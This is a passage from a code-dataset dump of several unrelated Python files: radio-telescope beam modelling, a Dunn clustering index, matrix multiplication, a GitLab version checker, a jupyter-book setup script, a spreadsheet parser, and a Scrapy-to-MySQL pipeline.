This may take a while!'%len(phi_arr.ravel()))\n \n #determine unique thetas, phis to speed up calculations\n if grid == False: \n phi_unique=np.unique(phi_arr) \n theta_unique=np.unique(theta_arr) #speeds up calculations\n else: #We expect all to be unique \n phi_unique=phi_arr\n theta_unique=theta_arr\n \n #determine phi-dependent component\n logger.debug('determine %s phi-dependent components...%s'%(len(phi_unique),datetime.datetime.now().time()))\n phi_comp=np.zeros((len(phi_unique),len(M)),dtype=np.complex128)*np.NaN\n for idx in np.arange(len(phi_unique)):\n #TODO: can this loop be vectorised?\n phi_comp[idx,:]=np.exp(1.0j*M*phi_unique[idx])*C_MN*MabsM/(N*(N+1))**0.5;\n \n #determine theta-dependent components\n #nomenclature:\n #T and P are the sky polarisations theta and phi\n #theta and phi are direction coordinates\n logger.debug('determine %s theta-dependent components...%s'%(len(theta_unique),datetime.datetime.now().time()))\n emn_T=np.zeros((len(theta_unique),len(M)),dtype=np.complex128)*np.NaN\n emn_P=emn_T*np.NaN #make copy\n \n for idx in range(len(theta_unique)):\n (P_sin,P1) = P1sin(nmax,theta_unique[idx]); #theta in radian\n #form emn theta and phi\n u=np.cos(theta_unique[idx]);\n emn_T[idx,:]=(1.0j)**N*(P_sin*(np.abs(M)*Q2*u-M*Q1)+Q2*P1)\n emn_P[idx,:]=(1.0j)**(N+1)*(P_sin*(M*Q2-np.abs(M)*Q1*u)-Q1*P1)\n \n logger.debug('calculate sigma...%s'%datetime.datetime.now().time())\n if grid==True: #Calculate via gridded approach\n #This method is faster than fully vectorised method\n # logger.debug('Loop...%s'%datetime.datetime.now().time())\n Sigma_P=np.zeros((len(phi_unique),len(theta_unique)),dtype=np.complex128)\n Sigma_T=np.zeros((len(phi_unique),len(theta_unique)),dtype=np.complex128) \n for t_i in range(len(theta_arr)):\n Sigma_P[:,t_i]=np.sum(np.tile(emn_P[t_i,:],(len(phi_arr),1))*phi_comp,axis=1)\n Sigma_T[:,t_i]=np.sum(np.tile(emn_T[t_i,:],(len(phi_arr),1))*phi_comp,axis=1) \n #Fully vectorised method:\n # phi_comp_tiled=np.tile(phi_comp[:,np.newaxis],[1,len(theta_unique),1])\n # Sigma_P=np.sum(np.tile(emn_P[np.newaxis],[len(phi_unique),1,1])*phi_comp_tiled,axis=2)\n # Sigma_T=np.sum(np.tile(emn_T[np.newaxis],[len(phi_unique),1,1])*phi_comp_tiled,axis=2) \n else: #Calculate for every value in theta,phi \n #Arrays/single value to fill\n Sigma_P=np.zeros(np.shape(phi_arr),dtype=np.complex128)*np.NaN\n Sigma_T=np.zeros(np.shape(theta_arr),dtype=np.complex128)*np.NaN\n #Loop through every theta,phi and calculate sigma\n for idx in range(len(phi_arr.ravel())): \n #Find location of phis and thetas\n phi_idx=(phi_unique==phi_arr.flat[idx])\n theta_idx=(theta_unique==theta_arr.flat[idx])\n #For this phi value, calculate sigmas (using the appropriate sigma values)\n Sigma_P.flat[idx]=np.sum(emn_P[theta_idx,:,]*phi_comp[phi_idx,:]) #emn_P.*Const\n Sigma_T.flat[idx]=np.sum(emn_T[theta_idx,:]*phi_comp[phi_idx,:]) #emn_T.*Const\n if idx%counter==0:\n logger.debug('Index %s of %s: %s'%(idx, len(phi_arr.ravel()), datetime.datetime.now().time()))\n #to match with FEKO (neglects: exp(jbeta r)/r factor)\n logger.debug('Done... 
%s'%datetime.datetime.now().time())\n \n # mu0=4*math.pi*1e-7\n # eps0=8.85418781761e-12\n # Zo=(mu0/eps0)**0.5\n # sqrt_fac=(Zo/(2*math.pi))**0.5\n #\n # E_P=sqrt_fac*Sigma_P\n # E_T=sqrt_fac*Sigma_T\n\n #Save for this polarisation\n Jones[pol,0]=Sigma_T\n Jones[pol,1]=Sigma_P\n return Jones\n \ndef P1sin(nmax,theta):\n \"\"\"Create the Legendre function flavors for FF expansion using spherical wave\n See:\n Calculating Far-Field Radiation Based on FEKO Spherical Wave Coefficients, \n draft 10 June 2015\n 14/07/2015: ATS - using slope estimator for u=1/-1 (forward/backward\n difference)\n \n Input:\n 1. theta (rad) is the cos\\theta or sin\\theta arguments\n 2. nmax is maximum n from FEKO Q1mn and Q2mn, n must be >=1\n \n Output:\n 1. P_sin: P_{n}^{|m|}(cos\\theta)/sin(theta) with FEKO order M,N \n 1. P1: P_{n}^{|m|+1}(cos\\theta) with FEKO order M,N\"\"\"\n \n #initialize for nmax, we have 2(1+...+nmax)+nmax=nmax^2+2*nmax long array\n P_sin=np.zeros((nmax**2+2*nmax),dtype=np.complex128)\n P1=P_sin*0 #copy\n \n #theta arguments\n u=np.cos(theta)\n sin_th=np.sin(theta)\n delu=1e-6; # for slope estimation\n \n #step from 1 to nmax\n for n in range(1,nmax+1):\n \n #legendre P_{n}^{|m|=0...n} (u)\n orders=np.arange(0,n+1)\n orders=orders.reshape(n+1,1)\n P=lpmv(orders,n,u)\n \n ##THESE ARE THE SAME:\n ##legendre(2,0:0.1:0.2) (matlab)\n ##scipy:\n ##a=np.arange(0,3)\n ##a=a.reshape(3,1)\n ##lpmv(b,2,np.arange(0,0.3,0.1)) \n \n #P_{n}^{|m|+1} (u)\n Pm1=np.append(P[1::],0) #I should just be able to use orders=np.arange(1,n+1), then append zero?\n Pm1=Pm1.reshape(len(Pm1),1) #FIXME: can probably make this and others 1-D\n #P_{n}^{|m|}(u)/sin_th\n Pm_sin=np.zeros((n+1,1),dtype=np.complex128) #initialize\n #parameters\n l=np.arange(0,n/2+1)\n\n if u==1:\n #special treatment depending on m;\n #for m=0, m=0 Pm_sin=inf so, the product m*Pm_sin is zero;\n #for m=1, we need a substitution\n #approach 1: based on E-9 in Harrington, this is not stable\n #for n>~45\n #Pm_sin(2,1)=-sum(((-1).^l.*factorial(2.*n-2.*l).*(n-2.*l))...\n # ./(2.^n.*factorial(l).*factorial(n-l).*factorial(n-2.*l)));\n #approach 2: based on slope estimate \n #Pn(cos x)/sin x = -dPn(u)/du\n Pu_mdelu=lpmv(orders,n,u-delu)\n\n Pm_sin[1,0]=-(P[0]-Pu_mdelu[0])/delu #backward difference\n \n #m>=2, value is 0, so initial values are OK\n elif u==-1:\n #approach 1: based on E-9 in Harrington, this is not stable\n #for n>~45\n #Pm_sin(2,1)=-sum(((-1).^l.*factorial(2.*n-2.*l).*(n-2.*l).*(-1).^(n-2.*l-1))...\n # ./(2.^n.*factorial(l).*factorial(n-l).*factorial(n-2.*l)));\n #approach 2: based on slope estimate \n #Pn(cos x)/sin x = -dPn(u)/du\n Pu_mdelu=lpmv(orders,n,u-delu)\n Pm_sin[1,0]=-(Pu_mdelu[0]-P[0])/delu #forward difference\n else:\n Pm_sin=P/sin_th\n \n #accumulate Psin and P1 for the m values\n ind_start=(n-1)**2+2*(n-1) #start index to populate\n ind_stop=n**2+2*n; #stop index to populate\n #assign\n P_sin[np.arange(ind_start,ind_stop)]=np.append(np.flipud(Pm_sin[1::,0]),Pm_sin)\n P1[np.arange(ind_start,ind_stop)]=np.append(np.flipud(Pm1[1::,0]),Pm1)\n return (P_sin,P1)\n \n\ndef get_grid(unit, pixels_per_deg):\n \"\"\"Return phi (Az), theta (ZA) grid\n Input: \n unit - 'deg' or 'rad'\n pixels_per_deg - number of pixels per degree along phi and theta axes\"\"\" \n \n logger.debug('Setting up phi (Az), theta (ZA) grid %s pixels per deg'%pixels_per_deg)\n degs_per_pixel=1./pixels_per_deg;\n n_phi=360/degs_per_pixel+1;\n n_theta=90/degs_per_pixel+1;\n logger.debug('%s pixels on phi axis'%n_phi)\n logger.debug('%s pixels on theta 
axis'%n_theta)\n\n theta_1D=np.arange(0,n_theta)*degs_per_pixel \n phi_1D=np.arange(0,n_phi)*degs_per_pixel\n if unit=='rad':\n theta_1D*=deg2rad\n phi_1D*=deg2rad\n theta=np.tile(theta_1D,(n_phi,1))\n phi=(np.tile(phi_1D,(n_theta,1))).T\n\n return {'theta':theta,'phi':phi, 'theta_1D':theta_1D,'phi_1D':phi_1D}\n \nif __name__ == \"__main__\":\n\n logger.setLevel(logging.DEBUG)\n h5filepath=pb.h5file # recent version was MWA_embedded_element_pattern_V02.h5\n target_freq_Hz=150e6 \n logger.debug('Initialising ApertureArray object with h5filepath = %s' % h5filepath)\n tile=ApertureArray(h5filepath,target_freq_Hz)\n# tile.calc_zenith_norm_fac()\n \n# my_Astro_Az=26.5651\n# my_ZA=15.3729 \n# delays=np.array([6, 7, 8, 9, 4, 5, 6, 7, 2, 3, 4, 5, 0, 1, 2, 3])\n##\n# my_Astro_Az=0\n# my_ZA=28 \n# delays=np.array([6,6,6,6,4,4,4,4,2,2,2,2,0,0,0,0])\n# \n my_Astro_Az=0\n my_ZA=0 \n delays=np.zeros([2,16]) #Dual-pol.\n \n amps=np.ones([2,16])\n\n logger.debug('Set up beam object')\n mybeam=Beam(tile, delays, amps=amps)\n\n grid=True #Use interpolated\n if grid:\n logger.debug('Get Az,El points')\n pixels_per_deg=2 \n mygrid=get_grid('rad',pixels_per_deg) \n az=mygrid['phi']\n za=mygrid['theta']\n logger.debug('Interpolate from beam') \n Jones=mybeam.get_interp_response(az, za)\n logger.debug('Normalise to zenith') \n Jones=tile.apply_zenith_norm_Jones(Jones)\n #Jones=mybeam.get_response(az, za, grid=grid)\n else:\n logger.info('Get response for mygrid Az,El')\n Jones=mybeam.get_response(az, za)\n\n logger.debug('Plot and save')\n my_Astro_Az='%.0f'%my_Astro_Az\n my_ZA='%.0f'%my_ZA\n \n point_dirn='Az%s-ZA%s'%(my_Astro_Az,my_ZA)\n filebase='%s-%sPixPerDeg-%s'%(point_dirn,pixels_per_deg,grid)\n title='Az_NtE=%s, ZA=%s\\n'%(my_Astro_Az,my_ZA)\n\n import beam_tools\n #Get cut at pointing direction\n idx=az==(float(my_Astro_Az)*deg2rad)\n cut_1D=Jones[:,:,idx]\n\n #Plot jones matrices\n beam_tools.plotArrayJones(Jones,target_freq_Hz,filebase,title,pixels_per_deg,cut_1D)\n\n #Plot power for XX and YY\n beam_tools.plotVisResponse(Jones,target_freq_Hz,filebase,title,pixels_per_deg,gridded=True)\n\n #Export to .mat file for verification against matlab code\n beam_tools.exportArrayJones(Jones,target_freq_Hz,filebase)\n\n #Project onto hemisphere and re-run plots and write to fits files\n logger.debug('Project beam on hemisphere')\n proj='SIN'\n [az,za]=beam_tools.makeAZZA(1000,proj)\n grid=True\n pixels_per_deg=5\n Jones=mybeam.get_interp_response(az, za, pixels_per_deg=pixels_per_deg)\n Jones=tile.apply_zenith_norm_Jones(Jones) #Normalise\n \n writetofits=False\n if writetofits: \n vis=beam_tools.makeUnpolInstrumentalResponse(Jones,Jones)\n from astropy.io import fits\n filename='beam_%sMHz_%s_E-W.fits'%(target_freq_Hz/1e6,proj)\n fits.writeto(filename, np.abs(vis[0,0])) \n filename='beam_%sMHz_%s_N-S.fits'%(target_freq_Hz/1e6,proj) \n fits.writeto(filename, np.abs(vis[1,1]))\n filename='%s_az.fits'%(proj) \n fits.writeto(filename, az)\n filename='%s_ZA.fits'%(proj)\n fits.writeto(filename, za) \n\n filebase='%s-%sPixPerDeg-%s'%(point_dirn,pixels_per_deg,grid) \n beam_tools.plotArrayJones(Jones,target_freq_Hz,filebase+'_'+proj,title,pixels_per_deg)\n beam_tools.plotVisResponse(Jones,target_freq_Hz,filebase+'_'+proj,title,pixels_per_deg)\n\n","sub_path":"beam_full_EE.py","file_name":"beam_full_EE.py","file_ext":"py","file_size_in_byte":32952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"244749884","text":"import numpy as np\n\ndef dunn(c, distances):\n \"\"\"\n Dunn index for 
cluster validation (the bigger, the better)\n \"\"\"\n unique_cluster_distances = np.unique(min_cluster_distances(c, distances))\n max_diameter = max(diameter(c, distances))\n\n if np.size(unique_cluster_distances) > 1:\n return unique_cluster_distances[1] / max_diameter\n else:\n return unique_cluster_distances[0] / max_diameter\n\ndef min_cluster_distances(c, distances):\n \"\"\"Calculates the distances between the two nearest points of each cluster\"\"\"\n min_distances = np.zeros((max(c) + 1, max(c) + 1))\n for i in np.arange(0, len(c)):\n if c[i] == -1: continue\n for ii in np.arange(i + 1, len(c)):\n if c[ii] == -1: continue\n if c[i] != c[ii] and distances[i, ii] > min_distances[c[i], c[ii]]:\n min_distances[c[i], c[ii]] = min_distances[c[ii], c[i]] = distances[i, ii]\n return min_distances\n\ndef diameter(c, distances):\n \"\"\"Calculates cluster diameters (the distance between the two farthest data points in a cluster)\"\"\"\n diameters = np.zeros(max(c) + 1)\n for i in np.arange(0, len(c)):\n if c[i] == -1: continue\n for ii in np.arange(i + 1, len(c)):\n if c[ii] == -1: continue\n if c[i] != -1 and c[ii] != -1 and c[i] == c[ii] and distances[i, ii] > diameters[c[i]]:\n diameters[c[i]] = distances[i, ii]\n return diameters ","sub_path":"TP_ABDOU-NGUYEN_NGOC-BIEN/TP_MachineLearning/dunn.py","file_name":"dunn.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"517164015","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Oct 4 23:54:45 2020\r\n\r\n@author: keyen\r\n\"\"\"\r\n#Custom function to multiply two matrices\r\ndef matrixmult(A,B):\r\n m=A.shape[0]\r\n n=A.shape[1]\r\n p=B.shape[1]\r\n f=np.zeros((m,p),dtype='int')\r\n if (A.shape[1]==B.shape[0]):\r\n for j in range(m):\r\n for k in range(p):\r\n f[j][k]=sum(A[j][r]*B[r][k] for r in range(n)) \r\n else:\r\n print('Shapes of the matrices do not match')\r\n \r\n return f\r\n\r\n#Function to check if two matrices are equal\r\ndef isSame(A,B):\r\n m=A.shape[0]\r\n n=A.shape[1]\r\n p=B.shape[1]\r\n for i in range(m):\r\n for j in range(n):\r\n if (A[i][j] != B[i][j]):\r\n return 0\r\n return 1\r\n#function to generate a random matrix as an array\r\ndef randmat(m,n,intervala=-5,intervalb=5):\r\n matrics=[]\r\n mtemp=[]\r\n for k in range(m):\r\n temp=[]\r\n for j in range(n):\r\n temp=[] \r\n temp=random.randint(intervala,intervalb)\r\n matrics.append(temp)\r\n mtemp=np.array(matrics)\r\n mtemp=mtemp.reshape(m,n)\r\n return mtemp\r\n\r\n\r\n#Example Program\r\n\r\nimport numpy as np\r\nimport time\r\nimport random\r\n\r\nprint(\"This program multiplies two random matrices of size A(m,n) and B(n,p) and compares the results with the built in function\")\r\nprint()\r\n\r\nprint(\"\")\r\nchoice=int(input(\"The size is determined randomly, press 1 to enter manually and press any number to continue \"))\r\ntry: \r\n choice\r\n if choice==1:\r\n print(\"Enter desired size of the matrices, A(m,n) and B(n,p) when prompted\")\r\n print()\r\n m=int(input(\"Enter m = \"))\r\n n=int(input(\"Enter n = \"))\r\n p=int(input(\"Enter p = \"))\r\n else:\r\n m=random.randint(1,10)\r\n n=random.randint(1,10)\r\n p=random.randint(1,10)\r\nfinally:\r\n martisA=randmat(m,n)\r\n martisB=randmat(n,p)\r\n \r\n#Comparison with inbuilt function \r\ncustomResult=matrixmult(martisA,martisB)\r\npythonResult=np.dot(martisA,martisB)\r\n\r\n#print results \r\nprint(\"\\nMatrix A = \\n\\n\", martisA)\r\nprint(\"\\nMatrix B = \\n\\n\", martisB)\r\nprint(\"\\nDot 
product using custom function \\n\\n\", customResult)\r\nprint(\"\\nDot product using inbuilt function\\n\\n\", pythonResult)\r\n\r\nif (isSame(customResult,pythonResult)==1):\r\n print('\\n\\nThe two methods yield the same result\\n\\n')","sub_path":"Assignment1/Vishnu_206106025/A1_Q9.py","file_name":"A1_Q9.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"181785386","text":"from ._checker import UpstreamChecker, NO_VERSION\nfrom ..gitlab_utils import GitLabUtils\nfrom gitlab.exceptions import GitlabError\n\n\nclass GitLabChecker(UpstreamChecker, GitLabUtils):\n \"\"\"\n Class for checking latest possible releases of given repository by\n release or tag release.\n Uses GitLab API v4: https://docs.gitlab.com/ee/api/\n \"\"\"\n\n def __init__(self, tool_info: dict, **kwargs):\n \"\"\"\n Please use token, with zero scopes defined!\n It is enough to be functional and rise API limit.\n \"\"\"\n UpstreamChecker.__init__(self, tool_info=tool_info, **kwargs)\n GitLabUtils.__init__(\n self,\n url=self.uri,\n namespace=self.repository,\n project=self.tool,\n token=kwargs.get(\"token\", \"\")\n )\n\n def _get_version(self, curr_ver: str = \"\"):\n if self.method == \"release\":\n self._by_release()\n elif self.method == \"tag-release\":\n self._by_tag()\n else:\n self.logger.error(\n f\"Invalid query method for {self.provider} in tool {self.project}.\"\n )\n self.version = NO_VERSION\n\n def _fail(self, r=None, e: GitlabError = None):\n \"\"\"\n Set version for not defined on fail, log error.\n \"\"\"\n self.version = NO_VERSION\n self.logger.error(\n f\"Failed to fetch version update information for {self.project}: {e}\"\n )\n\n def _by_release(self):\n \"\"\"\n Method for finding latest release from repository.\n \"\"\"\n try:\n r = self.get_releases()\n if r:\n self.version = r[0].name\n else:\n self.logger.debug(f\"No releases found for {self.project} with {self.provider}\")\n except GitlabError as e:\n self._fail(e=e)\n\n def _by_tag(self):\n \"\"\"\n Method for finding latest tag.\n \"\"\"\n try:\n r = self.get_tags()\n if r:\n self.version = r[0].name\n else:\n self.logger.debug(f\"No tags found for {self.project} with {self.provider}\")\n except GitlabError as e:\n self._fail(e=e)\n\n\n'''\n def _by_commit(self, current_commit: str = \"\"):\n \"\"\"\n Get latest commit of repository in master branch.\n If comparable commit is given, it also tells how many commits\n given commit is behind master.\n \"\"\"\n if current_commit:\n r = self.session.get(\n f\"{self.api}/{self.author}%2F{self.project}/repository/compare/master?from=master&to{current_commit}\n )\n if r.status_code == 200:\n self.extra_info = f\"{r.json().get('behind_by')} commits behind master.\"\n self.version = r.json().get(\"base_commit\").get(\"sha\")\n else:\n self._fail(r)\n else:\n r = self.session.get(\n f\"{self.api}/{self.author}%2F{self.project}/repository/commits/master\"\n )\n if r.status_code == 200:\n self.version = r.json().get(\"sha\")\n self.extra_info = \"Current commit in master.\"\n else:\n self._fail(r)\n\n\n def _get_date_of_commit(self, sha: str) -> datetime.datetime:\n \"\"\"\n Get date of commit by commit hash.\n \"\"\"\n r = self.session.get(\n f\"{self.api}/{self.author}%2F{self.project}/repository/tags\"\n )\n if r.status_code != 200:\n self.logger.error(\n f\"Unable to fetch date time for commit in tool {self.tool}: {r.json().get('message')}\"\n )\n raise ValueError\n return datetime.datetime.strptime(\n 
r.json()[0].get(\"commit\").get(\"committed_date\"), \"%Y-%m-%dT%H:%M:%S.%f%z\"\n )\n'''\n","sub_path":"cincanregistry/checkers/gitlab.py","file_name":"gitlab.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"617106761","text":"from setuptools import setup, find_packages\nimport os\nimport os.path as op\nfrom glob import glob\nfrom pathlib import Path\n\nversion = [\n line\n for line in Path(\"jupyter_book/__init__.py\").read_text().split()\n if \"__version__\" in line\n]\nversion = version[0].split(\" = \")[-1]\n\nsetup(\n name=\"jupyter-book\",\n version=version,\n python_requires=\">=3.6\",\n author=\"Project Jupyter Contributors\",\n author_email=\"jupyter@googlegroups.com\",\n url=\"https://jupyterbook.org/\",\n project_urls={\n \"Documentation\": \"https://jupyterbook.org\",\n \"Funding\": \"https://jupyter.org/about\",\n \"Source\": \"https://github.com/jupyter/jupyter-book/\",\n \"Tracker\": \"https://github.com/jupyter/jupyter-book/issues\",\n },\n # this should be a whitespace separated string of keywords, not a list\n keywords=\"reproducible science environments scholarship notebook\",\n description=\"Jupyter Book: Create an online book with Jupyter Notebooks\",\n long_description=open(\"./README.md\", \"r\").read(),\n long_description_content_type=\"text/markdown\",\n license=\"BSD\",\n packages=find_packages(),\n install_requires=[\n \"pyyaml\",\n \"docutils>=0.15\",\n \"sphinx\",\n \"myst-nb~=0.2.1\",\n \"click\",\n \"setuptools\",\n \"sphinx\",\n \"nbformat\",\n \"nbconvert\",\n \"nbclient\",\n (\n \"sphinx_togglebutton @ \"\n \"https://github.com/ExecutableBookProject/sphinx-togglebutton/archive/master.zip\"\n ),\n \"sphinx-copybutton\",\n \"sphinxcontrib-bibtex\",\n (\n \"sphinx_book_theme @ \"\n \"https://github.com/ExecutableBookProject/sphinx-book-theme/archive/master.zip\"\n ),\n ],\n extras_require={\n \"sphinx\": [\"folium\", \"numpy\", \"matplotlib\", \"ipywidgets\", \"pandas\", \"nbclient\"],\n \"testing\": [\"coverage\", \"pytest>=3.6,<4\", \"pytest-cov\", \"beautifulsoup4\"],\n },\n entry_points={\n \"console_scripts\": [\n \"jb = jupyter_book.commands:main\",\n \"jupyter-book = jupyter_book.commands:main\",\n ],\n },\n package_data={\"jupyter_book\": [\"book_template/*\",]},\n include_package_data=True,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"301591928","text":"#!/usr/bin/env python\n#import sys\n#import os\n#import re\n#from uncertainty_unfold import *\nimport ROOT\nfrom ROOT import gROOT, TGraph, TLatex, TCanvas, TPad, TFile, TH1, TH2D, TF1, TLatex, TMath, TROOT, TTree, TString, TH2, TStyle, TLegend, THStack\nfrom array import array\ndef get_jecr_1D(which_region, outdir, which_sample, uncertainty_hist_name, infilename, var_name, lumi, hist_name, draw_op ):\n f_in = TFile.Open(infilename)\n h_center = f_in.Get(hist_name)\n h_up = f_in.Get(hist_name+uncertainty_hist_name+\"_up\")\n h_down = f_in.Get(hist_name+uncertainty_hist_name+\"_down\")\n h_center.Scale(lumi)\n #h_center.Print(\"all\")\n\n h_up.Scale(lumi)\n h_down.Scale(lumi)\n\n h_center.SetLineColor(2)\n h_up.SetLineColor(4)\n h_down.SetLineColor(3)\n\n h_center.SetStats(0)\n h_up.SetStats(0)\n h_down.SetStats(0)\n\n NbinsX = h_center.GetNbinsX()\n NbinsY = h_center.GetNbinsY()\n\n Nbins = NbinsX*NbinsY\n h_uncertainty = []\n\n uncertainty = 0\n for j 
in range(NbinsX) :\n max_diff = max(0, abs(h_center.GetBinContent(j+1)-h_up.GetBinContent(j+1)), abs(h_center.GetBinContent(j+1)-h_down.GetBinContent(j+1)))\n uncertainty = 0\n if(h_center.GetBinContent(j+1) > 0) :\n uncertainty = max_diff/h_center.GetBinContent(j+1)\n h_uncertainty.append(uncertainty) \n\n if draw_op == 'on':\n c1 = TCanvas(uncertainty_hist_name,uncertainty_hist_name,900,600)\n fPads1 = TPad(\"pad1\", \"\", 0.00, 0.4, 0.99, 0.99)\n fPads2 = TPad(\"pad2\", \"\", 0.00, 0.00, 0.99, 0.4)\n fPads1.SetBottomMargin(0.02);\n fPads1.SetTicks(1,1);\n fPads1.SetTicks(1,1);\n\n fPads2.SetTopMargin(0.02);\n fPads2.SetBottomMargin(0.4)\n #fPads1.SetBottomMargin(0)\n #fPads2.SetTopMargin(0)\n #fPads2.SetBottomMargin(0.4)\n c1.cd()\n fPads1.Draw()\n fPads2.Draw()\n fPads1.cd()\n fPads2.SetGridy()\n fPads1.SetGridx()\n fPads2.SetGridx()\n\n \n h_up.SetTitle(uncertainty_hist_name)\n h_up.SetLineWidth(2)\n h_center.SetLineWidth(2)\n h_up.GetXaxis().SetLabelSize(0.0)\n h_down.SetLineWidth(2)\n h_up.SetLineStyle(7)\n h_down.SetLineStyle(7)\n\n h_up.Draw(\"hist\")\n h_center.Draw(\"hist same\")\n h_down.Draw(\"hist same\")\n\n leg3 = TLegend(0.7,0.7,0.9,0.9)\n leg3.AddEntry(h_up, \"up\")\n leg3.AddEntry(h_center, \"center\")\n leg3.AddEntry(h_down, \"down\")\n\n bin_width_signal = ['500', '600', '700', '1000', 'inf']\n bin_width_control = ['200', '300', '400', '500']\n #h_up.Print(\"all\")\n x1 = array('d',(4, 4))\n y1 = array('d',(0, 1.1*h_up.GetMaximum()))\n g1 = TGraph(2, x1, y1)\n g1.SetLineColor(1)\n g1.SetLineStyle(2)\n g1.SetLineWidth(2)\n\n x2 = array('d',(8, 8))\n y2 = array('d',(0, 1.1*h_up.GetMaximum()))\n g2 = TGraph(2, x2, y2)\n g2.SetLineColor(1)\n g2.SetLineStyle(2)\n g2.SetLineWidth(2)\n\n\n latex1 = TLatex()\n latex1.SetNDC();\n latex1.SetTextAngle(0);\n latex1.SetTextColor(1);\n latex1.SetTextSize(0.05);\n if which_region == 'signal':\n g1.Draw(\"C \")\n g2.Draw(\"C \")\n latex1.DrawLatex(0.13, 0.4, \"30 Gev < M_{l#gamma} < 80 GeV\");\n latex1.DrawLatex(0.38, 0.4, \"80 Gev < M_{l#gamma} < 130 GeV\");\n latex1.DrawLatex(0.65, 0.4, \"130 Gev < M_{l#gamma} < inf GeV\");\n print('max : ',h_up.GetMaximum())\n #h_up.SetMaximum(1.3 * h_up.GetMaximum())\n #maximum = 1.5 * h_up.GetMaximum()\n leg3.Draw()\n #fPads1.Update()\n fPads2.cd()\n\n nominal = h_center.Clone(\"nominal\")\n nomNoErr = nominal.Clone(\"nomNoErr\")\n for i in range(nomNoErr.GetNbinsX()) :\n nomNoErr.SetBinError(i+1,0)\n tmp_h_up = h_up.Clone()\n tmp_h_down = h_down.Clone()\n nominal.SetTitle(\"\")\n\n tmp_h_up.Divide(nominal)\n print('tmp_max : ',tmp_h_up.GetMaximum())\n tmp_h_down.Divide(nominal)\n nominal.Divide(nomNoErr)\n for i in range(nominal.GetNbinsX()) :\n nominal.SetBinError(i+1,nominal.GetBinError(i+1)/nomNoErr.GetBinContent(i+1))\n nominal.SetFillStyle(3001)\n nominal.SetFillColor(16)\n nominal.GetYaxis().SetLabelSize(0.07)\n nominal.GetYaxis().SetNdivisions(404)\n nominal.GetXaxis().SetTitle(var_name+\" [GeV]\")\n nominal.GetXaxis().SetLabelSize(0.1)\n nominal.GetXaxis().SetTitleFont(12)\n nominal.GetXaxis().SetTitleSize(0.1)\n #cout<GetMinimum()-0.1<<\" \"<GetMaximum()+0.05< xlrd:\n return xlrd.open_workbook(self._filename)\n\n def get_sheets(self) -> xlrd:\n return self._workbook.sheets()\n\n def get_cities_states_lats_longs(self) -> tuple:\n #preserve list order dont sort yet\n sheet = self.get_sheets()[0]\n cities = sheet.col_values(colx=0)[1:]\n states = sheet.col_values(colx=3)[1:] \n latitudes = sheet.col_values(colx=8)[1:] #N/S\n longitudes = sheet.col_values(colx=9)[1:] #E/W\n zip_code = 
sheet.col_values(colx=17)[1:]\n return (cities,states,latitudes,longitudes,zip_code)\n\n def map_cites_states_lats_longs(self) -> dict:\n container = OrderedDict()\n cities,states,lats,longs, zip_code = self.get_cities_states_lats_longs()\n for i,_ in enumerate(cities):\n container[cities[i] +','+ states[i]] = {'City':cities[i],\\\n 'State':states[i],'Latitude':lats[i], \\\n 'Longitude':longs[i],'Zipcode':zip_code[i]}\n return container\n\n \n\n\n \n\n\n \n\n \n\n\n\n\n#https://xlrd.readthedocs.io/en/latest/api.html","sub_path":"covid19_docker_redis_flask_webscrape/covid_19_docker_plot.py","file_name":"covid_19_docker_plot.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"370428785","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nclass TutorialPipeline(object):\n def process_item(self, item, spider):\n return item\n\n# Store the scraped data into a MySQL database\nfrom twisted.enterprise import adbapi\nimport MySQLdb\nimport MySQLdb.cursors\nfrom scrapy import log\n\nclass MySQLStorePipeline(object):\n def __init__(self, dbpool):\n self.dbpool = dbpool\n\n # Database parameters\n @classmethod\n def from_settings(cls, settings):\n dbargs = dict(\n host=settings['MYSQL_HOST'],\n db=settings['MYSQL_DBNAME'],\n user=settings['MYSQL_USER'],\n passwd=settings['MYSQL_PASSWD'],\n charset='utf8',\n cursorclass = MySQLdb.cursors.DictCursor,\n use_unicode= True,\n )\n dbpool = adbapi.ConnectionPool('MySQLdb', **dbargs)\n return cls(dbpool)\n\n\n # # Database parameters\n # def __init__(self):\n # dbargs = dict(\n # host = '10.39.211.198',\n # db = 'test',\n # user = 'root',\n # passwd = 'password',\n # cursorclass = MySQLdb.cursors.DictCursor,\n # charset = 'utf8',\n # use_unicode = True\n # )\n # self.dbpool = adbapi.ConnectionPool('MySQLdb',**dbargs)\n\n '''\n The default pipeline invoke function\n '''\n def process_item(self, item,spider):\n res = self.dbpool.runInteraction(self.insert_into_table,item)\n res.addErrback(self.handle_error)\n return item\n # Table to insert into; it must be created in advance\n def insert_into_table(self,conn,item):\n conn.execute('insert into chembridge(catalog, amount, price,qty) values(%s,%s,%s,%s)', (\n item['catalog'],\n item['amount'],\n # item['star'][0],\n item['price'],\n item['qty']\n ))\n def handle_error(self,e):\n log.err(e)","sub_path":"tutorial/tutorial/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
